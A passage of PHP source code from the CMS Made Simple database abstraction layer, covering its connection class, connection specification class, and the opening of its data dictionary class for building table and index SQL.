        return \CmsApp::get_instance()->GetDb();
    }

    /**
     * A function forumerly used to load the adodb library.
     * This method currently has no functionality.
     *
     * @deprecated
     */
    function load_adodb()
    {
        // this should only have been called by the core
        // but now does nothing, just in case it is called.
    }

    /**
     * An old method formerly used to ensure that we were re-connected to the proper database.
     * This method currently has no functionality.
     *
     * @deprecated
     */
    function adodb_connect()
    {
        // this may be called by UDT's etc. that are talking to other databases
        // or using manual mysql methods.
    }

    /**
     * An old function for handling a database error.
     *
     * @param string $dbtype
     * @param string $function_performed
     * @param int    $error_number
     * @param string $error_message
     * @param string $host
     * @param string $database
     * @param mixed  $connection_obj
     * @deprecated
     */
    function adodb_error($dbtype,$function_performed,$error_number,$error_message,
                         $host, $database, &$connection_obj)
    {
        // does nothing.... remove me later.
    }

}
?>
<?php
#BEGIN_LICENSE
#-------------------------------------------------------------------------
# Module: \CMSMS\Database\Connection (c) 2015 by Robert Campbell
#         (calguy1000@cmsmadesimple.org)
#  A class to define interaction with a database.
#
#-------------------------------------------------------------------------
# CMS - CMS Made Simple is (c) 2005 by Ted Kulp (wishy@cmsmadesimple.org)
# Visit our homepage at: http://www.cmsmadesimple.org
#
#-------------------------------------------------------------------------
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# However, as a special exception to the GPL, this software is distributed
# as an addon module to CMS Made Simple.  You may not use this software
# in any Non GPL version of CMS Made simple, or in any version of CMS
# Made simple that does not indicate clearly and obviously in its admin
# section that the site was built with CMS Made simple.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#
#-------------------------------------------------------------------------
#END_LICENSE

/**
 * This file defines the abstract database connection class.
 *
 * @package CMS
 */

namespace CMSMS\Database {

    /**
     * A class defining a database connection, and mechanisms for working with a database.
     *
     * This library is largely compatible with adodb_lite with the pear,extended,transaction plugins with a few
     * notable differences:
     *
     * Differences:
     * <ul>
     *  <li>GenID will not automatically create a sequence table.
     *    <p>We encourage you to not use sequence tables and use auto-increment fields instead.</p>
     *  </li>
     * </ul>
     *
     * @package CMS
     * @author Robert Campbell
     * @copyright Copyright (c) 2015, Robert Campbell <calguy1000@cmsmadesimple.org>
     * @since 2.2
     * @property-read float $query_time_total The total query time so far in this request (in seconds)
     * @property-read int $query_count The total number of queries executed so far.
     */
    abstract class Connection
    {
        /**
         * This constant defines an error with connecting to the database.
         */
        const ERROR_CONNECT = 'CONNECT';

        /**
         * This constant defines an error with an execute statement.
         */
        const ERROR_EXECUTE = 'EXECUTE';

        /**
         * This constant defines an error with a transaction.
         */
        const ERROR_TRANSACTION = 'TRANSACTION';

        /**
         * This constant defines an error in a datadictionary command.
         */
        const ERROR_DATADICT = 'DATADICTIONARY';

        /**
         * @ignore
         */
        private $_debug;

        /**
         * @ignore
         */
        private $_debug_cb;

        /**
         * @ignore
         */
        private $_query_count = 0;

        /**
         * @ignore
         */
        private $_queries = array();

        /**
         * @ignore
         */
        private $_errorhandler;

        /**
         * The actual connectionspec object.
         *
         * @internal
         */
        protected $_connectionSpec;

        /**
         * The last SQL command executed
         *
         * @internal
         * @param string $sql
         */
        public $sql;

        /**
         * Accumulated sql query time.
         *
         * @internal
         * @param float $query_time_total
         */
        protected $query_time_total;

        /**
         * Construct a new Connection.
         *
         * @param \CMSMS\Database\ConnectionSpec $spec
         */
        public function __construct(ConnectionSpec $spec)
        {
            $this->_connectionSpec = $spec;
        }

        /**
         * @ignore
         */
        public function __get($key)
        {
            if( $key == 'query_time_total' ) return $this->query_time_total;
            if( $key == 'query_count' ) return $this->_query_count;
        }

        /**
         * @ignore
         */
        public function __isset($key)
        {
            if( $key == 'query_time_total' ) return TRUE;
            if( $key == 'query_count' ) return TRUE;
            return FALSE;
        }

        /**
         * Create a new data dictionary object.
         * Data Dictionary objects are used for manipulating tables, i.e: creating, altering and editing them.
         * @return \CMSMS\Database\DataDictionary
         */
        abstract public function &NewDataDictionary();

        /**
         * Return the database type.
         *
         * @return string
         */
        abstract public function DbType();

        /**
         * Open the database connection.
         *
         * @return bool Success or failure
         */
        abstract public function Connect();

        /**
         * Close the database connection.
         */
        abstract public function Disconnect();

        /**
         * Test if the connection object is connected to the database.
         *
         * @return bool
         */
        abstract public function IsConnected();

        /**
         * An alias for Disconnect.
         */
        final public function Close() { return $this->Disconnect(); }

        //// utilities

        /**
         * Quote a string magically using the magic quotes flag.
         * This method is now just a deprecated alias for the qstr flag
         * as we now require magic quotes to be disabled.
         *
         * @deprecated
         * @param string $str
         * @return string
         */
        public function QMagic($str)
        {
            return $this->qstr($str);
        }

        /**
         * Quote a string in a database agnostic manner.
         * Warning: This method may require two way traffic with the database depending upon the database.
         * @param string $str
         * @return string
         */
        abstract public function qstr($str);

        /**
         * output the mysql expression for a string concatenation.
         * This function accepts a variable number of string arguments.
         *
         * @param $str First string to concatenate
         * @param $str,... unlimited number of strings to concatenate.
         * @return string
         */
        abstract public function concat();

        /**
         * Output the mysql expression to test if an item is null.
         *
         * @param string $field The field to test
         * @param string $ifNull The value to use if $field is null.
         * @return string
         */
        abstract public function IfNull( $field, $ifNull );

        /**
         * Output the number of rows affected by the last query.
         *
         * @return int
         */
        abstract public function Affected_Rows();

        /**
         * Return the numeric ID of the last insert query into a table with an auto-increment field.
         * @return int
         */
        abstract public function Insert_ID();

        //// primary query functions

        /**
         * The primary function for communicating with the database.
         *
         * @internal
         * @param string $sql The SQL query
         */
        abstract public function &do_sql($sql);

        /**
         * Create a prepared statement object.
         *
         * @param string $sql The SQL query
         * @return Statement
         */
        abstract public function &Prepare($sql);

        /**
         * Execute an SQL Select and limit the output.
         *
         * @param string $sql
         * @param int $nrows  The number of rows to return
         * @param int $offset The starting offset of rows to return
         * @param array Any additional paramters required by placeholders in the $sql statement.
         * @return \CMSMS\Database\ResultSet
         */
        public function &SelectLimit( $sql, $nrows = -1, $offset = -1, $inputarr = null )
        {
            $limit = null;
            $nrows = (int) $nrows;
            $offset = (int) $offset;
            if( $nrows >= 0 || $offset >= 0 ) {
                $offset = ($offset >= 0) ? $offset . "," : '';
                $nrows = ($nrows >= 0) ? $nrows : '18446744073709551615';
                $limit = ' LIMIT ' . $offset . ' ' . $nrows;
            }

            if ($inputarr && is_array($inputarr)) {
                $sqlarr = explode('?',$sql);
                if( !is_array(reset($inputarr)) ) $inputarr = array($inputarr);
                foreach( $inputarr as $arr ) {
                    $sql = ''; $i = 0;
                    foreach( $arr as $v ) {
                        $sql .= $sqlarr[$i];
                        switch(gettype($v)){
                        case 'string':
                            $sql .= $this->qstr($v);
                            break;
                        case 'double':
                            $sql .= str_replace(',', '.', $v);
                            break;
                        case 'boolean':
                            $sql .= $v ? 1 : 0;
                            break;
                        default:
                            if ($v === null) $sql .= 'NULL';
                            else $sql .= $v;
                        }
                        $i += 1;
                    }
                    $sql .= $sqlarr[$i];
                    if ($i+1 != sizeof($sqlarr)) {
                        $false = null;
                        return $false;
                    }
                }
            }
            $sql .= $limit;

            $rs = $this->do_sql( $sql );
            return $rs;
        }

        /**
         * Execute an SQL Command
         *
         * @param string $sql The SQL statement to execute.
         * @param array $inputarr Any parameters marked as placeholders in the SQL statement.
         * @return \CMSMS\Database\ResultSet
         */
        public function &Execute($sql, $inputarr = null)
        {
            $rs = $this->SelectLimit($sql, -1, -1, $inputarr );
            return $rs;
        }

        /**
         * Execute an SQL Commmand and return all of the results as an array.
         *
         * @param string $sql The SQL statement to execute.
         * @param array $inputarr Any parameters marked as placeholders in the SQL statement.
         * @return array An associative array of matched results.
         */
        public function GetArray($sql, $inputarr = null)
        {
            $result = $this->SelectLimit( $sql, -1, -1, $inputarr );
            if( !$result ) return;
            $data = $result->GetArray();
            return $data;
        }

        /**
         * An alias for the GetArray method.
         *
         * @param string $sql The SQL statement to execute.
         * @param array $inputarr Any parameters marked as placeholders in the SQL statement.
         * @return array
         */
        public function GetAll($sql, $inputarr = null)
        {
            return $this->GetArray($sql, $inputarr);
        }

        /**
         * A method to return an associative array.
         *
         * @deprecated
         * @see Pear::getAssoc()
         * @param string $sql The SQL statement to execute
         * @param array $inputarr Any parameters marked as placeholders in the SQL statement.
         * @param bool $force_array Force each element of the output to be an associative array.
         * @param bool $first2cols Only output the first 2 columns in an associative array.  Does not work with force_array.
         */
        public function GetAssoc( $sql, $inputarr = null, $force_array = false, $first2cols = false )
        {
            $data = null;
            $result = $this->SelectLimit($sql, -1, -1, $inputarr );
            if( $result ) $data = $result->GetAssoc($force_array,$first2cols);
            return $data;
        }

        /**
         * Execute an SQL statement that returns one column, and return all of the
         * matches as an array.
         *
         * @param string $sql The SQL statement to execute.
         * @param array $inputarr Any parameters marked as placeholders in the SQL statement.
         * @param bool $trim Optionally trim the output results.
         * @return array A single flat array of results, one entry per row matched.
         */
        public function GetCol($sql, $inputarr = null, $trim = false)
        {
            $data = null;
            $result = $this->SelectLimit($sql, -1, -1, $inputarr);
            if ($result) {
                $data = [];
                $key = null;
                while (!$result->EOF) {
                    $row = $result->Fields();
                    if( !$key ) $key = array_keys($row)[0];
                    $data[] = ($trim) ? trim($row[$key]) : $row[$key];
                    $result->MoveNext();
                }
            }
            return $data;
        }

        /**
         * Exeute an SQL statement that returns one row of results, and return that row
         * as an associative array.
         *
         * @param string $sql The SQL statement to execute.
         * @param array $inputarr Any parameters marked as placeholders in the SQL statement.
         * @return array An associative array representing a single resultset row.
         */
        public function GetRow($sql, $inputarr = null)
        {
            $nrows = 1;
            if( stripos( $sql, 'LIMIT' ) !== FALSE ) $nrows = -1;
            $rs = $this->SelectLimit( $sql, $nrows, -1, $inputarr );
            if( !$rs ) return FALSE;
            return $rs->Fields();
        }

        /**
         * Execute an SQL statement and return a single value.
         *
         * @param string $sql The SQL statement to execute.
         * @param array $inputarr Any parameters marked as placeholders in the SQL statement.
         * @return mixed
         */
        public function GetOne($sql, $inputarr = null)
        {
            $res = $this->Getrow( $sql, $inputarr );
            if( !$res ) return FALSE;
            $key = array_keys($res)[0];
            return $res[$key];
        }

        //// transactions

        /**
         * Begin a transaction
         */
        abstract public function BeginTrans();

        /**
         * Begin a smart transaction
         */
        abstract public function StartTrans();

        /**
         * Complete a smart transaction.
         * This method will either do a rollback or a commit depending upon if errors have been detected.
         *
         * @param bool $autoComplete If no errors have been detected attempt to auto commit the transaction.
         */
        abstract public function CompleteTrans($autoComplete = true);

        /**
         * Commit a simple transaction.
         *
         * @param bool $ok Indicates wether there is success or not.
         */
        abstract public function CommitTrans($ok = true);

        /**
         * Roll back a simple transaction.
         */
        abstract public function RollbackTrans();

        /**
         * Mark a transaction as failed.
         */
        abstract public function FailTrans();

        /**
         * Test if a transaction has failed.
         *
         * @return bool
         */
        abstract public function HasFailedTrans();

        //// sequence table stuff

        /**
         * For use with sequence tables, this method will generate a new ID value.
         *
         * This function will not automatically create the sequence table if not specified.
         *
         * @param string $seqname The name of the sequence table.
         * @return int
         * @deprecated
         */
        abstract public function GenID($seqname);

        // these methods should be in the DataDictionary stuff.

        /**
         * Create a new sequence table.
         *
         * @param string $seqname the name of the sequence table.
         * @param int $startID
         * @return bool
         * @deprecated
         */
        abstract public function CreateSequence($seqname,$startID=0);

        /**
         * Drop a sequence table
         * @param string $seqname The name of the sequence table.
         * @return bool
         */
        abstract public function DropSequence($seqname);

        //// time and date stuff

        /**
         * A utility method to convert a unix timestamp into a database specific string suitable
         * for use in queries.
         *
         * @param int $timestamp
         * @return string single-quoted date-time or 'null'
         */
        public function DBTimeStamp($timestamp)
        {
            if (empty($timestamp) && $timestamp !== 0) return 'null';

            // strlen(14) allows YYYYMMDDHHMMSS format
            if( is_string($timestamp) ) {
                if( strlen($timestamp) === 14 || preg_match('/[0-9\s:-]*/',$timestamp) ) {
                    $tmp = strtotime($timestamp);
                    if( $tmp < 1 ) return 'null';
                    $timestamp = $tmp;
                } else if( is_numeric($timestamp) ) {
                    $timestamp = (int) $timestamp;
                }
            }
            if( $timestamp > 0 ) return date("'Y-m-d H:i:s'",$timestamp);
        }

        /**
         * A convenience method for converting a database specific string representing a date and time
         * into a unix timestamp.
         *
         * @param string $str
         * @return int
         */
        public function UnixTimeStamp($str)
        {
            return strtotime($str);
        }

        /**
         * Convert a date into something that is suitable for writing to a database.
         *
         * @param mixed $date Either a string date, or an integer timestamp
         * @return string single-quoted localized date or 'null'
         */
        public function DBDate($date)
        {
            if (empty($date) && $date !== 0) return 'null';

            if (is_string($date) && !is_numeric($date)) {
                if ($date === 'null' || strncmp($date, "'", 1) === 0) return $date;
                $date = $this->UnixDate($date);
            }
            return \locale_ftime("'%x'",$date);
        }

        /**
         * Generate a unix timestamp representing the current date at midnight.
         *
         * @deprecated
         * @return int
         */
        public function UnixDate()
        {
            return strtotime('today midnight');
        }

        /**
         * An alias for the UnixTimestamp method.
         *
         * @return int
         */
        public function Time() { return $this->UnixTimeStamp(); }

        /**
         * An Alias for the UnixDate method.
         *
         * @return int
         */
        public function Date() { return $this->UnixDate(); }

        //// error and debug message handling

        /**
         * Return a string describing the latest error (if any)
         *
         * @return string
         */
        abstract public function ErrorMsg();

        /**
         * Return the latest error number (if any)
         *
         * @return int
         */
        abstract public function ErrorNo();

        /**
         * Set an error handler function
         *
         * @param callable $fn
         */
        public function SetErrorHandler($fn = null)
        {
            $this->_errorhandler = null;
            if( $fn && is_callable($fn) ) $this->_errorhandler = $fn;
        }

        /**
         * Toggle debug mode.
         *
         * @param bool $flag Enable or Disable debug mode.
         * @param callable $debug_handler
         */
        public function SetDebugMode($flag = true,$debug_handler = null)
        {
            $this->_debug = (bool) $flag;
            if( $debug_handler && is_callable($this->_debug_handler) ) $this->_debug_cb = $debug_handler;
        }

        /**
         * Set the debug callback.
         *
         * @param callable $debug_handler
         */
        public function SetDebugCallback(callable $debug_handler = null)
        {
            $this->_debug_cb = $debug_handler;
        }

        /**
         * Add a query to the debug log
         *
         * @internal
         * @param string $sql the SQL statement
         */
        protected function add_debug_query($sql)
        {
            $this->_query_count++;
            if( $this->_debug && $this->_debug_cb ) call_user_func($this->_debug_cb,$sql);
        }

        /**
         * A callback that is called when a database error occurs.
         * This method will by default call the error handler if it has been set.
         * If no error handler is set, an exception will be thrown.
         *
         * @internal
         * @param string $errtype The type of error
         * @param int $error_number The error number
         * @param string $error_message The error message
         */
        public function OnError($errtype, $error_number, $error_message )
        {
            if( $this->_errorhandler && is_callable($this->_errorhandler) ) {
                call_user_func($this->_errorhandler, $this, $errtype, $error_number, $error_message);
                return;
            }

            switch( $errtype ) {
            case self::ERROR_CONNECT:
                throw new DatabaseConnectionException($error_message,$error_number);

            case self::ERROR_EXECUTE:
                throw new DatabaseException($error_message,$error_number,$this->sql,$this->_connectionSpec);
            }
        }

        //// initialization

        /**
         * Create a new database connection object.
         * This is the preferred wa to open a new database connection.
         *
         * @param \CMSMS\Database\Connectionspec $spec An object describing the database to connect to.
         * @return \CMSMS\Database\Connection
     * @todo  Move this into a factory class
         */
        public static function &Initialize(ConnectionSpec $spec)
        {
            if( !$spec->valid() ) throw new ConnectionSpecException('Invalid or incorrect configuration information');
            $connection_class = '\\CMSMS\\Database\\'.$spec->type.'\\Connection';
            if( !class_exists($connection_class) ) throw new \LogicException('Could not find a database abstraction layer named '.$spec->type);

            $obj = new $connection_class($spec);
            if( !($obj instanceof Connection ) ) throw new \LogicException("$connection_class is not derived from the primary database class.");
            if( $spec->debug ) $obj->SetDebugMode();
            $obj->Connect();

            if( $spec->auto_exec ) $obj->Execute($spec->auto_exec);
            return $obj;
        }

    } // end of class

    /**
     * A special type of exception related to database queries.
     */
    class DatabaseException extends \LogicException
    {
        /**
         * @internal
         */
        protected $_connection;

        /**
         * @internal
         */
        protected $_sql;

        /**
         * Constructor
         *
         * @param string $msg The message string
         * @param int $number The error number
         * @param string $sql The related SQL statement, if any
         * @param \CMSMS\Database\ConnectionSpec The connection specification
         */
        public function __construct($msg,$number,$sql,ConnectionSpec $connection)
        {
            parent::__construct($msg,$number);
            $this->_connection = $connection;
            $this->_sql = $sql;
        }

        /**
         * Get the SQL statement related to this exception.
         * @return string
         */
        public function getSQL() { return $this->_sql; }

        /**
         * Get the Connectionspec that was used when generating the error.
         *
         * @return \CMSMS\Database\ConnectionSpec
         */
        public function getConnectionSpec() { return $this->_connection; }
    }

    /**
     * A special exception indicating a problem connecting to the database.
     */
    class DatabaseConnectionException extends \Exception {}

} // end of Namespace
<?php
#BEGIN_LICENSE
#-------------------------------------------------------------------------
# Module: \CMSMS\Database\ConnectionSpec (c) 2015 by Robert Campbell
#         (calguy1000@cmsmadesimple.org)
#  A class to define how to connect to a database.
#
#-------------------------------------------------------------------------
# CMS - CMS Made Simple is (c) 2005 by Ted Kulp (wishy@cmsmadesimple.org)
# Visit our homepage at: http://www.cmsmadesimple.org
#
#-------------------------------------------------------------------------
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# However, as a special exception to the GPL, this software is distributed
# as an addon module to CMS Made Simple.  You may not use this software
# in any Non GPL version of CMS Made simple, or in any version of CMS
# Made simple that does not indicate clearly and obviously in its admin
# section that the site was built with CMS Made simple.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#
#-------------------------------------------------------------------------
#END_LICENSE

/**
 * This file defines the ConnectionSpec class.
 *
 * @package CMS
 */

namespace CMSMS\Database;

/**
 * A class defining all of the details needed to connect to a database.
 * Some database drivers may not require all of the parameters.
 *
 * @package CMS
 * @author Robert Campbell
 * @copyright Copyright (c) 2015, Robert Campbell <calguy1000@cmsmadesimple.org>
 * @since 2.2
 * @param string $type The database connection type.  Defaults to 'mysqli'.
 * @param string $host The hostname to connect to.
 * @param string $username The authentication username
 * @param string $password The authentication password
 * @param string $dbname The database name
 * @param string $prefix The table name prefix.
 * @param int    $port   The connection port
 * @param bool   $persistent Wether or not to use persistent connections.
 * @param bool   $debug  Enable debug mode.
 */
class ConnectionSpec
{
    /**
     * @ignore
     */
    private $_data = array('type'=>'mysqli','host'=>null,'username'=>null,'password'=>null,
                           'dbname'=>null,'prefix'=>null,'port'=>null,'persistent'=>false,'debug'=>false,
                           'auto_exec'=>null);

    /**
     * @ignore
     */
    public function __get($key)
    {
        if( !array_key_exists($key,$this->_data) ) throw new \InvalidArgumentException("$key is not a valid member of ".__CLASS__);
        return $this->_data[$key];
    }

    /**
     * @ignore
     */
    public function __set($key,$val)
    {
        if( !array_key_exists($key,$this->_data) ) throw new \InvalidArgumentException("$key is not a valid member of ".__CLASS__);
        $this->_data[$key] = trim($val);
    }

    /**
     * Test if this connectionspec is valid.
     * Returns true if there is enough information to connect to the database.
     *
     * @return bool
     */
    public function valid()
    {
        if( !$this->type || !$this->host || !$this->username || !$this->password || !$this->dbname ) return FALSE;
        return TRUE;
    }
}

/**
 * A special exception to indicate a problem with a ConnectionSpec
 */
class ConnectionSpecException extends \Exception {}

?>
<?php
#BEGIN_LICENSE
#-------------------------------------------------------------------------
# Module: \CMSMS\Database\DataDictionary (c) 2015 by Robert Campbell
#         (calguy1000@cmsmadesimple.org)
#  A class to define methods of interacting with database tables.
#
#-------------------------------------------------------------------------
# CMS - CMS Made Simple is (c) 2005 by Ted Kulp (wishy@cmsmadesimple.org)
# Visit our homepage at: http://www.cmsmadesimple.org
#
#-------------------------------------------------------------------------
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# However, as a special exception to the GPL, this software is distributed
# as an addon module to CMS Made Simple.  You may not use this software
# in any Non GPL version of CMS Made simple, or in any version of CMS
# Made simple that does not indicate clearly and obviously in its admin
# section that the site was built with CMS Made simple.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#
#-------------------------------------------------------------------------
#END_LICENSE

/**
 * This file defines the DataDictionary class.
 *
 * This file is based on the DataDictionary base class from the adodb_lite library
 * which was in turn a fork of the adodb library at approximately 2004.
 *
 * Credits and kudos to the authors of those packages.
 *
 * @package CMS
 */

namespace CMSMS\Database;

// shouldn't need this.
if (!function_exists('ctype_alnum')) {
    /**
     * @ignore
     */
	function ctype_alnum($text) {
		return preg_match('/^[a-z0-9]*$/i', $text);
	}
}

/**
 * @ignore
 */
function _array_change_key_case($an_array)
{
	if (is_array($an_array)) {
		$new_array = array();
		foreach($an_array as $key=>$value)
			$new_array[strtoupper($key)] = $value;

	   	return $new_array;
   }

	return $an_array;
}

/**
 * @ignore
 */
function Lens_ParseArgs($args,$endstmtchar=',',$tokenchars='_.-')
{
	$pos = 0;
	$intoken = false;
	$stmtno = 0;
	$endquote = false;
	$tokens = array();
	$tokens[$stmtno] = array();
	$max = strlen($args);
	$quoted = false;

	while ($pos < $max) {
		$ch = substr($args,$pos,1);
		switch($ch) {
		case ' ':
		case "\t":
		case "\n":
		case "\r":
			if (!$quoted) {
				if ($intoken) {
					$intoken = false;
					$tokens[$stmtno][] = implode('',$tokarr);
				}
				break;
			}
			$tokarr[] = $ch;
			break;
		case '`':
			if ($intoken) $tokarr[] = $ch;
		case '(':
		case ')':
		case '"':
		case "'":
			if ($intoken) {
				if (empty($endquote)) {
					$tokens[$stmtno][] = implode('',$tokarr);
					if ($ch == '(') $endquote = ')';
					else $endquote = $ch;
					$quoted = true;
					$intoken = true;
					$tokarr = array();
				} else if ($endquote == $ch) {
					$ch2 = substr($args,$pos+1,1);
					if ($ch2 == $endquote) {
						$pos += 1;
						$tokarr[] = $ch2;
					} else {
						$quoted = false;
						$intoken = false;
						$tokens[$stmtno][] = implode('',$tokarr);
						$endquote = '';
					}
				} else
					$tokarr[] = $ch;
			}else {
				if ($ch == '(') $endquote = ')';
				else $endquote = $ch;
				$quoted = true;
				$intoken = true;
				$tokarr = array();
				if ($ch == '`') $tokarr[] = '`';
			}
			break;
		default:
			if (!$intoken) {
				if ($ch == $endstmtchar) {
					$stmtno += 1;
					$tokens[$stmtno] = array();
					break;
				}
				$intoken = true;
				$quoted = false;
				$endquote = false;
				$tokarr = array();
			}
			if ($quoted) $tokarr[] = $ch;
			else if (ctype_alnum($ch) || strpos($tokenchars,$ch) !== false) $tokarr[] = $ch;
			else {
				if ($ch == $endstmtchar) {
					$tokens[$stmtno][] = implode('',$tokarr);
					$stmtno += 1;
					$tokens[$stmtno] = array();
					$intoken = false;
					$tokarr = array();
					break;
				}
				$tokens[$stmtno][] = implode('',$tokarr);
				$tokens[$stmtno][] = $ch;
				$intoken = false;
			}
		}
		$pos += 1;
	}
	if ($intoken) $tokens[$stmtno][] = implode('',$tokarr);

	return $tokens;
}


/**
 * A class defining methods to work directly with database tables.
 *
 * This file is based on the DataDictionary base class from the adodb_lite library
 * which was in turn a fork of the adodb library at approximately 2004.
 *
 * Credits and kudos to the authors of those packages.
 *
 * @package CMS
 * @author Robert Campbell
 * @copyright Copyright (c) 2015, Robert Campbell <calguy1000@cmsmadesimple.org>
 * @since 2.2
 */
abstract class DataDictionary
{
    /**
     * The database connection object.
     *
     * @internal
     */
	protected $connection;

    /**
     * The SQL prefix to use when creating a drop table command.
     *
     * @internal
     */
	protected $dropTable = 'DROP TABLE %s';

    /**
     * The SQL prefix to use when renaming a table.
     *
     * @internal
     */
	protected $renameTable = 'RENAME TABLE %s TO %s';

    /**
     * The SQL prefix to use when dropping an index.
     *
     * @internal
     */
	protected $dropIndex = 'DROP INDEX %s';

    /**
     * The SQL string to use (in the alter table command) when adding a column.
     *
     * @internal
     */
	protected $addCol = ' ADD';

    /**
     * The SQL string to use (in the alter table command) when altering a column.
     *
     * @internal
     */
	protected $alterCol = ' ALTER COLUMN';

    /**
     * The SQL string to use (in the alter table command) when dropping a column.
     *
     * @internal
     */
	protected $dropCol = ' DROP COLUMN';

    /**
     * The SQL command template for renaming a column.
     *
     * @internal
     */
	protected $renameColumn = 'ALTER TABLE %s RENAME COLUMN %s TO %s';	// table, old-column, new-column, column-definitions (not used by default)

    /**
     * @ignore
     */
	protected $nameRegex = '\w';

    /**
     * @ignore
     */
	protected $nameRegexBrackets = 'a-zA-Z0-9_\(\)';

    /**
     * @ignore
     */
	protected $autoIncrement = false;

    /**
     * @ignore
     */
	protected $invalidResizeTypes4 = array('CLOB','BLOB','TEXT','DATE','TIME'); // for changetablesql

    /**
     * Constructor
     *
     * @param \CMSMS\Database\Connection $conn
     */
    protected function __construct(Connection $conn)
    {
        $this->connection = $conn;
    }

    /**
     * A function to return the database type.
     *
     * @internal
     * @return string
     */
    protected function _DBType() { return $this->connection->DbType(); }

    /**
     * A function to return the datadictionary meta type for a database column type.
     *
     * @internal
     * @param string $t The database column type
     * @param int $len The length of the field (some database types may ignore this)
     * @param mixed $fieldobj An optional reference to a field object (advanced)
     * @return string
     */
	abstract protected function MetaType($t,$len=-1,$fieldobj=false);

    /**
     * Return the list of tables in the currently connected database.
     *
     * @return string[]
     */
    abstract public function MetaTables();

    /**
     * Return the list of columns in a table within the currently connected database.
     *
     * @param string $table The table name.
     * @return string[]
     */
    abstract public function MetaColumns($table);

    /**
     * Return a database specific column type given a datadictionary meta column type.
     *
     * @internal
     * @param string $meta The datadictionary column type.
     * @return string
     */
	abstract protected function ActualType($meta);

    /**
     * Given a string name, return a quoted name in a form suitable for the database.
     *
     * @internal
     * @param string $name The input name
     * @param bool $allowBrackets wether brackets should be quoted or not.
     * @return string
     */
	protected function NameQuote($name = NULL,$allowBrackets=false)
	{
		if (!is_string($name)) return FALSE;

		$name = trim($name);

		if ( !is_object($this->connection) ) return $name;

		$quote = $this->connection->nameQuote;

		// if name is of the form `name`, quote it
		if ( preg_match('/^`(.+)`$/', $name, $matches) ) return $quote . $matches[1] . $quote;

		// if name contains special characters, quote it
		$regex = ($allowBrackets) ? $this->nameRegexBrackets : $this->nameRegex;

		if ( !preg_match('/^[' . $regex . ']+$/', $name) ) return $quote . $name . $quote;

		return $name;
	}

    /**
     * Given a table name, optionally quote it.
     *
     * @internal
     * @param string $name
     * @return string
     */
	protected function TableName($name)
	{
		return $this->NameQuote($name);
	}

    /**
     * Given an array of SQL commands execute them in sequence.
     *
     * @param string[] $sql An array of sql commands.
     * @param bool $continueOnError wether to continue on errors or not.
     * @return int 2 for no errors, 1 if an error occured.
     */
	public function ExecuteSQLArray($sql, $continueOnError = true)
	{
		$rez = 2;
		$conn = &$this->connection;
		foreach($sql as $line) {
            try {
                $ok = $conn->Execute($line);
                if (!$ok) {
                    if (!$continueOnError) return 0;
                    $rez = 1;
                }
            }
            catch( \Exception $e ) {
                if( !$continueOnError ) throw $e;
                $rez = 1;
                // eat the exception
            }
		}
		return $rez;
	}

    /**
     * Create the SQL commands that will result in a database being created.
     *
     * @param string $dbname
     * @param array  An associative array of database options.
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
     */
	public function CreateDatabase($dbname,$options=false)
	{
		$options = $this->_Options($options);
		$sql = array();

		$s = 'CREATE DATABASE ' . $this->NameQuote($dbname);
		if (isset($options[$this->upperName]))
			$s .= ' '.$options[$this->upperName];

		$sql[] = $s;
		return $sql;
	}

	/**
     * Generate the SQL to create an index.
     *
     * @param string $idxname The index name
     * @param string $tabname The table name
     * @param string|string[] $flds A list of the table fields to create the index with.  Either an array of strings or a comma separated list.
     * @param array An associative array of options
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
	*/
	public function CreateIndexSQL($idxname, $tabname, $flds, $idxoptions = false)
	{
		if (!is_array($flds)) {
      $flds = array_map( 'trim', explode(',',$flds) );
		}
		foreach($flds as $key => $fld) {
			# some indexes can use partial fields, eg. index first 32 chars of "name" with NAME(32)
			$flds[$key] = $this->NameQuote($fld,$allowBrackets=true);
		}
		return $this->_IndexSQL($this->NameQuote($idxname), $this->TableName($tabname), $flds, $this->_Options($idxoptions));
	}

    /**
     * Generate the SQL to drop an index
     *
     * @param string $idxname The index name
     * @param string $tabname The table name
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
     */
	public function DropIndexSQL ($idxname, $tabname = NULL)
	{
		return array(sprintf($this->dropIndex, $this->NameQuote($idxname), $this->TableName($tabname)));
	}

    /**
     * Generate the SQL to add columns to a table.
     *
     * @param string $tabname The Table name.
     * @param string $flds The column definitions (using DataDictionary meta types)
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
     * @see CreateTableSQL
     */
	public function AddColumnSQL($tabname, $flds)
	{
		$tabname = $this->TableName ($tabname);
		$sql = array();
		list($lines,$pkey) = $this->_GenFields($flds);
		$alter = 'ALTER TABLE ' . $tabname . $this->addCol . ' ';
		foreach($lines as $v) {
			$sql[] = $alter . $v;
		}
		return $sql;
	}

	/**
	 * Change the definition of one column
	 *
	 * @param string $tabname table-name
